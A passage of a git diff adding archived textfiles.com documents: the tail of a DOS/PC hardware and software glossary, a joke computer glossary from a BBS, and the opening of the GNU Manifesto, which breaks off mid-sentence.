programs to +allocate memory, invoke real-mode software, etc. See also Virtual Control +Program Interface. + +DPB + see Drive Paramter Block + +DPL + see DOS Parameter List + +DPMI + see DOS Protected-Mode Interface + +DRAM + (Dynamic Random Access Memory) RAM memory which essentially consists +of a tiny capacitor for each bit of memory. Since capacitors do not hold +a charge indefinitely, DRAM must be constantly refreshed to avoid losing +its contents. Also, the process of reading the contents of the memory are +destructive, meaning extra time must be spent restoring the contents of +memory addresses which are accessed, so DRAM is slower than SRAM. See also +Refresh, SRAM. + +Drive Parameter Block + The DOS Drive Parameter Block stores the description of the +media layout for a logical drive, as well as some housekeeping +information. See also INT 21h Function 1Fh and INT 21h Function 32h. + +DTA + see Disk Transfer Address + +DWORD + Doubleword; four bytes. Commonly used to hold a 32-bit +segment:offset or selector:offset address. + +Dynamic Link Library + A collection of subroutines which are linked with a program at +the time it is loaded into memory rather than permanently placed in the +executable. This has the advantage of allowing a single copy of the +subroutine library to reside on disk or in memory even when it is used +by many programs. It also permits all programs using the DLL to be +updated without recompiling simply by installing a new version of the +library. + +EGA + (Enhanced Graphics Adapter) IBM's second color video board for the +IBM PC family, capable of a maximum resolution of 640x350 pixels in 16 +simultaneous colors of a total of 64 possible colors. + +EISA + (Enhanced Industry-Standard Architecture) A 32-bit superset of the +IBM AT's expansion bus (which is now known as the ISA or Industry-Standard +Architecture bus). + +EMS + see Expanded Memory Specification + +EOI + (End of Interrupt) A particular command sent to the interrupt +controller to indicate that the interrupt has been handled by software +and that new interrupts of the same or lower priority may now be signalled +by the interrupt controller. + +ESDI + (Enhanced Small Device Interface) A disk drive interface type +which was briefly popular before IDE took over. An ESDI drive can +transfer data between the drive and controller at 10, 15, or 20 +megabits per second, which is faster than an MFM or RLL controller but +slower than what is possible with an IDE or SCSI drive. See also IDE. + +Exception + A signal by the CPU that some error condition has been encountered +that it can not deal with without a program's intervention. The most commonly +encountered exceptions on Intel processors are Exceptions 12 and 13, which +are stack and general problems, respectively. Exception 13 is typically +caused by a memory access which wraps from the end of a segment back to +the beginning. + +Expanded Memory Specification + A specification devised by Lotus, Intel, and Microsoft for +accessing more than one megabyte of memory by bank-switching additional +memory into the one megabyte real mode address space. + +Extended BIOS Data Area + A block of memory, typically the 1K at the top of conventional +memory, which is used to store additional data for use by the BIOS which +does not fit into the 256-byte data area at segment 0040h. + +Extended File Control Block + A DOS File Control Block which has had an additional seven +bytes prepended to permit control of file attributes (which are stored +in the appendage). See also FCB. + +Extended Memory + Memory beyond the one megabyte address which is available only +on 80286 and higher machines. Except for a small portion (the High +Memory Area), extended memory is only accessible from protected mode. + +Extended Memory Specification + A specification devised by Microsoft which allows multiple +programs to share extended (above 1 megabyte) memory and noncontiguous +memory above 640K. See also Upper Memory Block. + +External Device Interface + A series of calls made by the DESQview multitasker on various +"interesting" events, which may be intercepted by programs which wish to +keep track of the current system state. See also Callout. + +FAT + see File Allocation Table + +FCB + see File Control Block + +File Allocation Table + A data structure on disk that records which clusters are free, +which are unusable, and which have been allocated. The clusters occupied +by a file are linked into a list in the file allocation table, allowing +DOS to find the contents of the file. + +File Control Block + A data record in the calling program's address space which is +used by DOS 1.x functions to record the state of an open file. See +also INT 21h Function 13h. + +File Handle + A small positive integer used to identify the previously-opened +file on which a program wishes to perform an operation. + +Flush + To force the copying of any data still stored in temporary +buffers to its final destination. + +FM + (Frequency Modulation) A method of encoding data as a series of +magnetic flux reversals on disk or tape, commonly known as single-density +recording. In frequency modulation, a series of clock pulses are written +at regular intervals, with one data bit for each clock pulse. See also +MFM, RLL. + +Formatting + Preparing a storage medium (usually magnetic media such as a +disk or tape) for storing data. Low-level or physical formatting +writes all necessary housekeeping data to enable the storage device +to read the media and may also initialize the storage units on the +media to a known state. High-level or logical formatting writes data +used by the operating system, such as allocation information and +directories onto media which has already been physically formatted. +Formatting programs often perform both a low-level and a high-level +format. + +FOSSIL + (Fido/Opus/Seadog Standard Interface Layer) A standardized API +for performing serial I/O, originally used by the Fido and Opus bulletin- +board software and Seadog bulletin-board mailer, but now in wider use. + +FTP + (File Transfer Protocol) The standard protocol for copying files +from one machine to another on a TCP/IP (Internet) network. Also the +program of the same name with which a user may transfer files. + +Gather-Write + see Scatter/Gather + +Handle + A short identifier, usually a small integer or a pointer, for +some other object which is maintained or controlled by the operating +system or environment; a particular handle may be valid system-wide or +may have meaning only for a particular process. See also File Handle. + +HGC + (Hercules Graphics Controller) A monochrome video adapter capable +of 720x352 monochrome graphics. The HGC was the first non-IBM video +adapter for the IBM PC. See also CGA, MDA. + +High Memory Area + The first 65520 bytes (64K less 16 bytes) of extended memory. +This area is accessible from real mode on the 80286 and higher +processors because these processors do not wrap addresses at one +megabyte as the 8088 and 8086 do. See also A20, INT 2Fh Functions +4A01h. + +HMA + see High Memory Area + +Horizontal Retrace + When a monitor has finished displaying a single scan line, it must +move it electron beam(s) back to the left edge of the CRT, during which time +it turns off the beam. On the original CGA (and some early clones), the +only time one could access the display memory without causing "snow" was +during the horizontal or vertical retrace periods, as the display adapter +was not itself accessing the display memory during those times. See also +Vertical Retrace. + +IDE + (Integrated Drive Electronics) A type of disk drive interface +which essentially extends the PC's expansion bus all the way to the +drive and places the drive controller on the disk drive itself. See +also ESDI. + +IFS + see Installable File System + +Installable File System + An Installable File System which allows non-DOS format media to +be used by DOS. In most ways, an IFS is very similar to a networked +drive, although an IFS would typically be local rather than remote. +See also INT 21h Function 52h. + +IP + (Internet Protocol) The lower level (transport layer) of the +TCP/IP protocol suite. See also TCP, TCP/IP. + +IPC + (Inter-Process Communication) Any one of numerous methods for +allowing two or more separate processes to exchange data. + +IPX + (Internetwork Packet Exchange) A low-level layer of Novell's + NetWare networking software. + +IRQ + (Interrupt ReQuest) A hardware line connected to the interrupt +controller chip which signals that a CPU interrupt should be generated. + +ISA + (Industry-Standard Architecture) The expansion bus used by the +IBM PC/AT. See also EISA. + +JFT + see Job File Table + +Job File Table + The Job File Table (also called Open File Table) stored in a +program's PSP which translates handles into SFT numbers. See also INT +21h Function 26h. + +LCD + (Liquid Crystal Display) + +List of Lists + An internal DOS table of lists and other tables through which +most DOS-internal data structures may be reached. See INT 21h Function +52h. + +Little-Endian + One of the two major ways of organizing multi-byte numeric +values in memory. A little-endian layout places the least significant +byte of the value in the lowest (first) memory location, i.e. 12345678h +is stored as 78h 56h 34h 12h. Intel processors are little-endian. +Compare Big-Endian. + +LPT + Abbreviation for Line PrinTer. + +MCB + see Memory Control Block + +MCGA + (Multi-Color Graphics Array) The low-end color adapter offered +in IBM's early PS/2 series machines. + +MDA + (Monochrome Display Adapter) A text-only video adapter introduced +together with the original IBM PC. See also CGA, HGC. + +Memory Control Block + The data structure containing the length and owner (among other +things) of a portion of the memory managed by DOS. See INT 21h +Function 52h. + +MFM + (Modified Frequency Modulation) A method of encoding data as a +series of magnetic flux reversals on disk or tape, commonly known as +double-density recording. In contrast to FM, modified frequency +modulation omits all clock pulses except those between pairs of zero +bits. See also FM, RLL. + +Mickey + The smallest increment of motion a mouse can sense. + +MIDI + (Musical Instrument Digital Interface) A standardized interface +for controlling musical instruments with a computer. + +Modem + (contraction of MOdulator/DEModulator) + +Multitasking + Any of a number of methods by which multiple programs may +execute concurrently, with rapid switching between the programs giving +the appearance that all are executing simultaneously. + +MZ + The letters M and Z appear in numerous places in DOS (memory +control blocks, .EXE header, etc.); the conventional explanation is +that these are the initials of Mark Zbikowski, one of the principal +architects of MSDOS 2.0. + +NCB + see Network Control Block + +NDIS + (Network Driver Interface Specification) A hardware-independent +network interface developed by Microsoft and 3com. See also Packet +Driver, TCP/IP. + +NetBIOS + One of a number of low-level device-independent network +interfaces; the other major interfaces are Novell's IPX and the +Internet's IP (Internet Protocol, the lower-level portion of TCP/IP). + +Network Control Block + A Network Control Block used to pass requests to NetBIOS and +receive status information from the NetBIOS handler. + +Network Redirector + A program which permits access to network devices (disks, +printers, etc.) using the MSDOS kernel network redirector interface. +See also Network Shell, Redirector Interface. + +Network Shell + A program which permits access to network devices (disks, +printers, etc.) by intercepting DOS calls before they reach the DOS +kernel and handling those operating on network devices while passing +through actions on local devices. See also Network Redirector. + +NMI + see Non-Maskable Interrupt + +Non-Maskable Interrupt + An interrupt which can not be disabled by clearing the CPU's +interrupt enable flag, unlike most normal interrupts. Non-maskable +interrupts are typically used to signal calamities which require +immediate action, such as a hardware failure or imminent loss of power. + +Non-Volatile RAM + Memory which can be modified like normal RAM but does not lose +its contents when the system's power is turned off. This memory may be +powered by a battery when the system power if off, or it may be a type +of memory which does not need electricity to maintain its contents, +such as EEPROM or bubble memory. + +NVRAM + see Non-Volatile RAM + +ODI + (Open Data-link Interface) A hardware-independent network +interface developed by Novell, Inc. See also NDIS, Packet Driver. + +Open File Table + see Job File Table + +Overscan Area + The "border" between the edge of the area where graphics or text can +be displayed and the actual edge of the area the video adapter can illuminate +on the monitor's screen. + +Overscan Register + On a display adapter, the control register which specifies the color +to be displayed in the overscan area. + +Packet Driver + Any one of the numerous drivers conforming to FTP Software's +Packet Driver Specification, which provides a hardware-independent +network interface. See also NDIS, ODI. + +Page Fault + A CPU-generated signal, and the operating system's reaction to it, +generated when a program accesses a page of virtual memory which is not +located in RAM at the time. The operating system's response is to load in +the required page, possibly writing some other page out to disk in order +to make room. See also INT 0E. + +Palette Register + A memory location on the video controller which specifies the actual + color displayed for a particular color number. + +Park + To move a hard disk's read/write heads to a position in which +it is safe to turn off the power and transport the disk drive. Many +drives also lock the heads into position when they are parked, +providing additional protection from sudden movement. + +Pel + see Pixel + +Pixel + A picture element, the smallest addressable unit of a graphical +display. + +Post + Make known, either generally or to a specific handler, that a +particular event of interest has occurred. + +POST + see Power-On Self-Test + +Power-On Self-Test + A brief examination of the system's functionality performed +each time the system is turned on. + +Print Spooler + see SPOOL. + +Program Segment Prefix + The Program Segment Prefix is a 256-byte data area prepended to +a program when it is loaded. It contains the command line that the +program was invoked with, and a variety of housekeeping information for +DOS. See also INT 21h Function 26h. + +Protected Mode + One of the operating modes of the 80286 and higher Intel +processors, in which addresses used by programs no longer correspond to +physical addresses and the CPU enforces various protection mechanisms +designed to prevent one program from disrupting other programs or the +operating system. See also Real Mode, Virtual-86 Mode. + +PSP + see Program Segment Prefix + +PWORD + Six bytes. Used to hold an 80386 protected-mode "far" address, +consisting of a segment selector and a 32-bit offset, or a Turbo Pascal +"real" variable. See also DWORD, QWORD. + +QWORD + (quad-word) Eight bytes. See also DWORD, PWORD. + +RAM + (Random Access Memory) See also DRAM, SRAM. + +Real Mode + One of the operating modes of the 80286 and higher Intel +processors, and the only operating mode of the 8088, 8086, 80186, and +80188 processors. In this mode, all addresses used by programs +correspond directly to real physical addresses (thus the full name, +Real Address Mode) and there are no CPU-imposed protections between +programs. See also Protected Mode, Virtual-86 Mode. + +Real-Time Clock + A battery-powered clock which continues to maintain its time even +while the system is powered down. On PCs, the real-time clock contains a +small amount of battery-powered memory (set CMOS RAM). + +Redirector Interface + The set of device-independent INT 2Fh function calls invoked by +the MSDOS kernel to operate on devices it recognizes as network +devices. These function calls provide a lower-level interface than the +INT 21h calls made to DOS, allowing a program intercepting these +functions to be simpler than one intercepting INT 21h calls. See INT +2Fh Functions 1100h through 1130h. + +Refresh + The process of periodically rewriting the contents of a DRAM +memory chip to keep it from fading. The term "refresh" is also commonly +applied to redrawing the image on a CRT's phosphors. See also DRAM. + +RGB + (Red-Green-Blue) The color specification mechanism normally +used in computer displays, where colors are separated into their +primary-color components. See also YUV. + +RLL + (Run-Length Limited) A method of encoding data as a series of +magnetic flux reversals on disk or tape. RLL can achieve higher data +densities than MFM recording because it encodes the data such that +(on average), fewer than one flux reversal per data bit is required +(however, timing becomes more critical). RLL is actually an entire +family of encoding methods, specified with two numbers indicating the +minimum and maximum distances between one bits (flux transitions). The +variant normally called RLL is RLL-2,7; RLL-1,7 and RLL-3,9 are also in +use. MFM is in effect RLL-1,3. See also FM, MFM. + +ROM + (Read-Only Memory) A memory for program storage which may not be +changed by the program as it runs. + +RTC + see Real-Time Clock + +Scan Code + The actual key number sent by the keyboard, which differs from the +key codes seen by application programs. The enhanced (101/102-key) keyboard +actually sends different scan codes than the original (83/84-key) IBM +keyboard, but these are normally translated by the keyboard controller into +the scan codes used by the original keyboard before they become visible to +programs. + +Scatter/Gather + A technique in which the contiguous data of a disk sector or sectors +is transferred to or from multiple non-contiguous areas of memory. When +reading into multiple areas of memory, this is called a scatter-read; the +opposing operation is called gather-write. + +Scatter-Read + see Scatter/Gather + +SCSI + (Small Computer Systems Interface) A system-independent +expansion bus typically used to connect hard disks, tape drives, and +CD-ROMs to a computer. A host adapter connects the SCSI bus to the +computer's own bus. See also ESDI, IDE. + +SDA + see Swappable Data Area + +Sector + The smallest addressable unit of data on a disk; under MS-DOS, +this is normally 512 bytes. See also Track. + +SFT + see System File Table + +SPOOL + (Simultaneous Peripheral Operation OnLine) The process of +performing output to a slow peripheral such as a printer while other +tasks continue running on the CPU. This term dates back to mainframe +days before the invention of timesharing. + +SQL + (Structured Query Language) + +SRAM + (Static Random Access Memory) RAM which typically consists of one +flip-flop per bit of memory. Unlike DRAMs, static RAM retains its contents +as long as power is applied. Because there is no need to refresh the +contents of memory addresses which are read, SRAM is faster than DRAM, +but it is more expensive and typically is available in much smaller sizes +than DRAM because each bit occupies more space on the chip. See also DRAM. + +SVGA + (Super VGA) A video adapter capable of higher resolution +(pixels and/or colors) than the 320x200x256 and 640x480x16 which IBM's +VGA adapter is capable of producing. See also VESA. + +Swappable Data Area + The portion of the DOS data segment containing all of the +variables used internally by DOS to record the state of a function call +in progress. See also INT 21h Function 5D06h and INT 21h Function +5D0Bh. + +System File Table + A System File Table is a DOS-internal data structure used to +maintain the state of an open file for the DOS 2+ handle functions, +just as an FCB maintains the state for DOS 1.x functions. See also INT +21h Function 52h. + +TCP + (Transmission Control Protocol) A higher level (session layer) +of the TCP/IP protocol suite. See also IP, TCP/IP. + +TCP/IP + The protocol suite originally developed by DARPA for use on its +ARPAnet network, which is now known as the Internet. See also IP, TCP. + +TSR + (Terminate and Stay Resident) A program which remains in memory +after terminating in order to provide services to other programs or the +user. The name comes from the name of the DOS function call used to +remain in memory after termination. + +Track + One of multiple concentric circular rings of data on a single +data-bearing surface of a disk. Tracks at the same location on +different surfaces form a cylinder. + +UMB + see Upper Memory Block + +UNC + (Universal Naming Convention) The standard way of describing +network servers and their directories under MS-DOS and Windows NT. A +name in UNC format consists of two backslashes followed by the server +name, optionally followed by another backslash and a list of +backslash-separated fields; for example +\\SERVER1\SHARED-DIR\SUBDIR1\SUBDIR2\FILENAME.EXT. + +Upper Memory Block + A noncontiguous section of allocatable memory located between +the 640K and 1024K addresses. See also INT 21h Function 52h. + +V86 + see Virtual-86 Mode + +VCPI + see Virtual Control Program Interface + +VDM + see Virtual DOS Machine + +VDS + see Virtual DMA Specification + +VDU + (Video Display Unit) Mainframe-speak for computer monitor. + +Vertical Retrace + When a monitor has finished displaying an image by sweeping its +electron beam(s) over the face of the CRT, it has to move the beam back up +to the top of the display. During the time this takes, the beam is turned +off. The vertical retrace interval is a good time to change the displayed +picture for smooth animation. See also Horizontal Retrace. + +VESA + (Video Electronics Standards Association) An industry group +which sets both hardware and software standards and recommendations. +The term VESA is also used to denote compliance with the VESA SuperVGA +BIOS Extensions, a standard set of video BIOS functions for accessing +video modes of higher resolution than those defined by IBM. + +VGA + (Video Graphics Array) The video adapter introduced with the +IBM PS/2 series of computers. + +Virtual-86 Mode + One of the operating modes of the 80386 and 80486 processors in +which user programs run as if the CPU were in Real Mode, while +providing the protection and address-mapping capabilities of Protected +Mode to a supervisor program which oversees the virtual machine on +which the user programs are running. This mode is called Virtual-86 +because one or more virtual 8086 environments are run on a single CPU. +See also Protected Mode, Real Mode, Virtual Machine. + +Virtual Control Program Interface + A simple API for protected-mode programs to allocate memory and +switch into or out of protected mode. See also DOS Protected-Mode Interface. + +Virtual DMA Specification + A set of interrupt calls which permit the use of DMA even on +systems running in protected or Virtual-86 mode with their address +remapping, or systems such as Micro Channel PS/2s with multiple bus +masters independently performing DMA operations. + +Virtual DOS Machine + A special type of virtual machine provided by OS/2 version 2.0, +in which a copy of MS-DOS or an MS-DOS compatible operating system (or +even an incompatible 8086 operating system) is run and appears to have +full control of the system. See also Virtual Machine, INT 21h Function +64h. + +Virtual Machine + One method for multitasking programs is to virtualize the CPU +and other hardware, giving the appearance of sole possession of the +system to each program being run. Such a virtualized environment is +called a virtual machine. See also Virtual-86 Mode, Virtual DOS +Machine. + +virus + A program which attaches itself to other programs for the purpose +of duplicating itself. Viruses often (but not always) contain harmful +code which is triggered by some event, after a certain number of +reproductions, or on a specific date. See also worm. + +VM + see Virtual Machine + +VxD + A virtual device driver for Windows 3.0 or 3.1. See also +device driver. + +WORM + (Write Once, Read Many) A storage medium which may be written +exactly once, but may not be altered once data is stored. + +worm + A program which duplicates itself, typically across networks. +In contrast to a virus, a worm does not attach itself to other programs, +but can reproduce itself independently. See also virus. + +Write-Through + One of two main types of caches, the write-through cache immediately +writes any new information to the medium it is caching, so that the cache +never contains information which is not already present on the cached device. +See also cache, + +XBDA + see Extended BIOS Data Area + +XDI + see External Device Interface + +XGA + (Extended Graphics Array) + +XMS + see Extended Memory Specification + +YIQ + see YUV + +YUV + A color specification mechanism used in NTSC-type color +television signals. Y represents luminance (overall brightness, the +only part of the signal used by black-and-white televisions), while U +and V are chrominance (color) information. Also called YIQ. See also +RGB. diff --git a/textfiles.com/computers/glossary.txt b/textfiles.com/computers/glossary.txt new file mode 100644 index 00000000..9539527d --- /dev/null +++ b/textfiles.com/computers/glossary.txt @@ -0,0 +1,86 @@ +Yet another computer glossary... + +(There are a zillion of these computer glossaries floating around, but +this one was actually amusing.} + +Thanks to RASTAMAN JA for contributing this text file. + + beta test, v. + To voluntarily entrust one's data, one's livelihood and one's + sanity to hardware or software intended to destroy all + three. In earlier days, virgins were often selected to beta + test volcanos. + + bit, n. + A unit of measure applied to color. Twenty-four-bit color + refers to expensive $3 color as opposed to the cheaper 25 + cent, or two-bit, color that use to be available a few years + ago. + + buzzword, n. + The fly in the ointment of computer literacy. + + clone, n. + 1. An exact duplicate, as in "our product is a clone of their + product." 2. A shoddy, spurious copy, as in "their product is + a clone of our product." + + enhance, v. + To tamper with an image, usually to its detriment. + + genlock, n. + Why he stays in the bottle. + + guru, n. + A computer owner who can read the manual. + + handshaking protocol, n. + A process employed by hostile hardware devices to initate a + terse but civil dialogue, which, in turn, is characterized by + occasional misunderstanding, sulking, and name-calling. + + italic, adj. + Slanted to the right to emphasize key phrases. Unique to + Western alphabets; in Eastern languages, the same phrases are + often slanted to the left. + + Japan, n. + A fictional place where elves, gnomes and economic + imperialists create electronic equipment and computers using + black magic. It is said that in the capital city of + Akihabara, the streets are paved with gold and semiconductor + chips grow on low bushes from which they are harvested by the + happy natives. + + kern, v. + 1. To pack type together as tightly as the kernels on an ear + of corn. 2. In parts of Brooklyn and Queens, N.Y., a small, + metal object used as part of the monetary system. + + modem, adj. + Up-to-date, new-fangled, as in "Thoroughly Modem Millie." An + unfortunate byproduct of kerning. + + pixel, n. + A mischievous, magical spirit associated with screen + displays. The computer industry has frequently borrowed from + mythology: Witness the sprites in computer graphics, the + demons in artificial intelligence, and the trolls in the + marketing department. + + prototype, n. + First stage in the life cycle of a computer product, folowed + by pre-alpha, alpha, beta, release version, corrected release + version, upgrade, corrected upgrade, etc. Unlike its + successors, the prototype is not expected to work. + + revolutionary, adj. + Repackaged. + + Unix, N. + A computer operating system, once thought to be flabby and + impotent, that now shows a surprising interest in making off + with the workstation harem. + +[Downloaded from NAC JACK BBS - thanks to Hexen Hammer] + \ No newline at end of file diff --git a/textfiles.com/computers/gnu b/textfiles.com/computers/gnu new file mode 100644 index 00000000..b25d489f --- /dev/null +++ b/textfiles.com/computers/gnu @@ -0,0 +1,478 @@ + + +The GNU Manifesto + +Copyright (C) 1985 Richard M. Stallman + (Copying permission notice at the end.) + +What's GNU? Gnu's Not Unix! + +GNU, which stands for Gnu's Not Unix, is the name for the complete +Unix-compatible software system which I am writing so that I can give it +away free to everyone who can use it. Several other volunteers are helping +me. Contributions of time, money, programs and equipment are greatly +needed. + +So far we have an Emacs text editor with Lisp for writing editor commands, +a source level debugger, a yacc-compatible parser generator, a linker, and +around 35 utilities. A shell (command interpreter) is nearly completed. A +new portable optimizing C compiler has compiled itself and may be released +this year. An initial kernel exists but many more features are needed to +emulate Unix. When the kernel and compiler are finished, it will be +possible to distribute a GNU system suitable for program development. We +will use @TeX{} as our text formatter, but an nroff is being worked on. We +will use the free, portable X window system as well. After this we will +add a portable Common Lisp, an Empire game, a spreadsheet, and hundreds of +other things, plus on-line documentation. We hope to supply, eventually, +everything useful that normally comes with a Unix system, and more. + +GNU will be able to run Unix programs, but will not be identical to Unix. +We will make all improvements that are convenient, based on our experience +with other operating systems. In particular, we plan to have longer +filenames, file version numbers, a crashproof file system, filename +completion perhaps, terminal-independent display support, and perhaps +eventually a Lisp-based window system through which several Lisp programs +and ordinary Unix programs can share a screen. Both C and Lisp will be +available as system programming languages. We will try to support UUCP, +MIT Chaosnet, and Internet protocols for communication. + +GNU is aimed initially at machines in the 68000/16000 class with virtual +memory, because they are the easiest machines to make it run on. The extra +effort to make it run on smaller machines will be left to someone who wants +to use it on them. + +To avoid horrible confusion, please pronounce the `G' in the word `GNU' +when it is the name of this project. + + +Who Am I? + +I am Richard Stallman, inventor of the original much-imitated EMACS editor, +formerly at the Artificial Intelligence Lab at MIT. I have worked +extensively on compilers, editors, debuggers, command interpreters, the +Incompatible Timesharing System and the Lisp Machine operating system. I +pioneered terminal-independent display support in ITS. Since then I have +implemented one crashproof file system and two window systems for Lisp +machines, and designed a third window system now being implemented; this +one will be ported to many systems including use in GNU. [Historical note: +The window system project was not completed; GNU now plans to use the +X window system.] + + +Why I Must Write GNU + +I consider that the golden rule requires that if I like a program I must +share it with other people who like it. Software sellers want to divide +the users and conquer them, making each user agree not to share with +others. I refuse to break solidarity with other users in this way. I +cannot in good conscience sign a nondisclosure agreement or a software +license agreement. For years I worked within the Artificial Intelligence +Lab to resist such tendencies and other inhospitalities, but eventually +they had gone too far: I could not remain in an institution where such +things are done for me against my will. + +So that I can continue to use computers without dishonor, I have decided to +put together a sufficient body of free software so that I will be able to +get along without any software that is not free. I have resigned from the +AI lab to deny MIT any legal excuse to prevent me from giving GNU away. + + +Why GNU Will Be Compatible with Unix + +Unix is not my ideal system, but it is not too bad. The essential features +of Unix seem to be good ones, and I think I can fill in what Unix lacks +without spoiling them. And a system compatible with Unix would be +convenient for many other people to adopt. + + +How GNU Will Be Available + +GNU is not in the public domain. Everyone will be permitted to modify and +redistribute GNU, but no distributor will be allowed to restrict its +further redistribution. That is to say, proprietary modifications will not +be allowed. I want to make sure that all versions of GNU remain free. + + +Why Many Other Programmers Want to Help + +I have found many other programmers who are excited about GNU and want to +help. + +Many programmers are unhappy about the commercialization of system +software. It may enable them to make more money, but it requires them to +feel in conflict with other programmers in general rather than feel as +comrades. The fundamental act of friendship among programmers is the +sharing of programs; marketing arrangements now typically used essentially +forbid programmers to treat others as friends. The purchaser of software +must choose between friendship and obeying the law. Naturally, many decide +that friendship is more important. But those who believe in law often do +not feel at ease with either choice. They become cynical and think that +programming is just a way of making money. + +By working on and using GNU rather than proprietary programs, we can be +hospitable to everyone and obey the law. In addition, GNU serves as an +example to inspire and a banner to rally others to join us in sharing. +This can give us a feeling of harmony which is impossible if we use +software that is not free. For about half the programmers I talk to, this +is an important happiness that money cannot replace. + + +How You Can Contribute + +I am asking computer manufacturers for donations of machines and money. +I'm asking individuals for donations of programs and work. + +One consequence you can expect if you donate machines is that GNU will run +on them at an early date. The machines should be complete, ready to use +systems, approved for use in a residential area, and not in need of +sophisticated cooling or power. + +I have found very many programmers eager to contribute part-time work for +GNU. For most projects, such part-time distributed work would be very hard +to coordinate; the independently-written parts would not work together. +But for the particular task of replacing Unix, this problem is absent. A +complete Unix system contains hundreds of utility programs, each of which +is documented separately. Most interface specifications are fixed by Unix +compatibility. If each contributor can write a compatible replacement for +a single Unix utility, and make it work properly in place of the original +on a Unix system, then these utilities will work right when put together. +Even allowing for Murphy to create a few unexpected problems, assembling +these components will be a feasible task. (The kernel will require closer +communication and will be worked on by a small, tight group.) + +If I get donations of money, I may be able to hire a few people full or +part time. The salary won't be high by programmers' standards, but I'm +looking for people for whom building community spirit is as important as +making money. I view this as a way of enabling dedicated people to devote +their full energies to working on GNU by sparing them the need to make a +living in another way. + + +Why All Computer Users Will Benefit + +Once GNU is written, everyone will be able to obtain good system software +free, just like air. + +This means much more than just saving everyone the price of a Unix license. +It means that much wasteful duplication of system programming effort will +be avoided. This effort can go instead into advancing the state of the +art. + +Complete system sources will be available to everyone. As a result, a user +who needs changes in the system will always be free to make them himself, +or hire any available programmer or company to make them for him. Users +will no longer be at the mercy of one programmer or company which owns the +sources and is in sole position to make changes. + +Schools will be able to provide a much more educational environment by +encouraging all students to study and improve the system code. Harvard's +computer lab used to have the policy that no program could be installed on +the system if its sources were not on public display, and upheld it by +actually refusing to install certain programs. I was very much inspired by +this. + +Finally, the overhead of considering who owns the system software and what +one is or is not entitled to do with it will be lifted. + +Arrangements to make people pay for using a program, including licensing of +copies, always incur a tremendous cost to society through the cumbersome +mechanisms necessary to figure out how much (that is, which programs) a +person must pay for. And only a police state can force everyone to obey +them. Consider a space station where air must be manufactured at great +cost: charging each breather per liter of air may be fair, but wearing the +metered gas mask all day and all night is intolerable even if everyone can +afford to pay the air bill. And the TV cameras everywhere to see if you +ever take the mask off are outrageous. It's better to support the air +plant with a head tax and chuck the masks. + +Copying all or parts of a program is as natural to a programmer as +breathing, and as productive. It ought to be as free. + + +Some Easily Rebutted Objections to GNU's Goals + + "Nobody will use it if it is free, because that means + they can't rely on any support." + "You have to charge for the program + to pay for providing the support." + +If people would rather pay for GNU plus service than get GNU free without +service, a company to provide just service to people who have obtained GNU +free ought to be profitable. + +We must distinguish between support in the form of real programming work +and mere handholding. The former is something one cannot rely on from a +software vendor. If your problem is not shared by enough people, the +vendor will tell you to get lost. + +If your business needs to be able to rely on support, the only way is to +have all the necessary sources and tools. Then you can hire any available +person to fix your problem; you are not at the mercy of any individual. +With Unix, the price of sources puts this out of consideration for most +businesses. With GNU this will be easy. It is still possible for there to +be no available competent person, but this problem cannot be blamed on +distribution arrangements. GNU does not eliminate all the world's problems, +only some of them. + +Meanwhile, the users who know nothing about computers need handholding: +doing things for them which they could easily do themselves but don't know +how. + +Such services could be provided by companies that sell just hand-holding +and repair service. If it is true that users would rather spend money and +get a product with service, they will also be willing to buy the service +having got the product free. The service companies will compete in quality +and price; users will not be tied to any particular one. Meanwhile, those +of us who don't need the service should be able to use the program without +paying for the service. + + "You cannot reach many people without advertising, + and you must charge for the program to support that." + "It's no use advertising a program people can get free." + +There are various forms of free or very cheap publicity that can be used to +inform numbers of computer users about something like GNU. But it may be +true that one can reach more microcomputer users with advertising. If this +is really so, a business which advertises the service of copying and +mailing GNU for a fee ought to be successful enough to pay for its +advertising and more. This way, only the users who benefit from the +advertising pay for it. + +On the other hand, if many people get GNU from their friends, and such +companies don't succeed, this will show that advertising was not really +necessary to spread GNU. Why is it that free market advocates don't want +to let the free market decide this? + + "My company needs a proprietary operating system + to get a competitive edge." + +GNU will remove operating system software from the realm of competition. +You will not be able to get an edge in this area, but neither will your +competitors be able to get an edge over you. You and they will compete in +other areas, while benefitting mutually in this one. If your business is +selling an operating system, you will not like GNU, but that's tough on +you. If your business is something else, GNU can save you from being +pushed into the expensive business of selling operating systems. + +I would like to see GNU development supported by gifts from many +manufacturers and users, reducing the cost to each. + + "Don't programmers deserve a reward for their creativity?" + +If anything deserves a reward, it is social contribution. Creativity can +be a social contribution, but only in so far as society is free to use the +results. If programmers deserve to be rewarded for creating innovative +programs, by the same token they deserve to be punished if they restrict +the use of these programs. + + "Shouldn't a programmer be able to ask for a reward for his creativity?" + +There is nothing wrong with wanting pay for work, or seeking to maximize +one's income, as long as one does not use means that are destructive. But +the means customary in the field of software today are based on +destruction. + +Extracting money from users of a program by restricting their use of it is +destructive because the restrictions reduce the amount and the ways that +the program can be used. This reduces the amount of wealth that humanity +derives from the program. When there is a deliberate choice to restrict, +the harmful consequences are deliberate destruction. + +The reason a good citizen does not use such destructive means to become +wealthier is that, if everyone did so, we would all become poorer from the +mutual destructiveness. This is Kantian ethics; or, the Golden Rule. +Since I do not like the consequences that result if everyone hoards +information, I am required to consider it wrong for one to do so. +Specifically, the desire to be rewarded for one's creativity does not +justify depriving the world in general of all or part of that creativity. + + "Won't programmers starve?" + +I could answer that nobody is forced to be a programmer. Most of us cannot +manage to get any money for standing on the street and making faces. But +we are not, as a result, condemned to spend our lives standing on the +street making faces, and starving. We do something else. + +But that is the wrong answer because it accepts the questioner's implicit +assumption: that without ownership of software, programmers cannot possibly +be paid a cent. Supposedly it is all or nothing. + +The real reason programmers will not starve is that it will still be +possible for them to get paid for programming; just not paid as much as +now. + +Restricting copying is not the only basis for business in software. It is +the most common basis because it brings in the most money. If it were +prohibited, or rejected by the customer, software business would move to +other bases of organization which are now used less often. There are +always numerous ways to organize any kind of business. + +Probably programming will not be as lucrative on the new basis as it is +now. But that is not an argument against the change. It is not considered +an injustice that sales clerks make the salaries that they now do. If +programmers made the same, that would not be an injustice either. (In +practice they would still make considerably more than that.) + + "Don't people have a right to control how their creativity is used?" + +"Control over the use of one's ideas" really constitutes control over other +people's lives; and it is usually used to make their lives more difficult. + +People who have studied the issue of intellectual property rights carefully +(such as lawyers) say that there is no intrinsic right to intellectual +property. The kinds of supposed intellectual property rights that the +government recognizes were created by specific acts of legislation for +specific purposes. + +For example, the patent system was established to encourage inventors to +disclose the details of their inventions. Its purpose was to help society 